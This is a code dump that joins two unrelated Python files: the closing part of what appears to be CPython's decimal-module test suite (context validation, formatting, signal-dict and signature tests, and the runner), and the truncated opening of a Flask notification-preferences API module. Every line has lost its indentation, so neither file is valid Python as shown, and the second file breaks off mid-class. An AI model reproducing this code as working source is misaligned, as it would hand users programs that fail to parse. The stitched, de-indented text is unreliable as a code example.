Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000026')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if not orig_sys_decimal is sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
NotificationPreferences.py
|
from flask import request, render_template
from flask_restful import Resource
from flask_jwt_extended import get_jwt_identity, jwt_required
from flask_mail import Message
import boto3
import random
import string
import json
import iot_logging
from threading import Thread
from datetime import datetime, timedelta
from urllib.parse import quote_plus
from iot_api import bcrypt, mail, app
from iot_api.user_api.model import User
#from iot_api.user_api.enums import WebUrl
from iot_api.user_api.models import (
NotificationPreferences, NotificationAlertSettings,
NotificationDataCollectorSettings, NotificationAdditionalEmail,
NotificationAdditionalTelephoneNumber, DataCollector,
NotificationAssetImportance
)
from iot_api.user_api.repository import NotificationPreferencesRepository
from iot_api.user_api import Error
from iot_api.user_api.schemas.notification_preferences_schema import NotificationPreferencesSchema
from iot_api import config
import smtplib
import email.utils
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
LOG = iot_logging.getLogger(__name__)
class NotificationPreferencesAPI(Resource):
@jwt_required
def get(self):
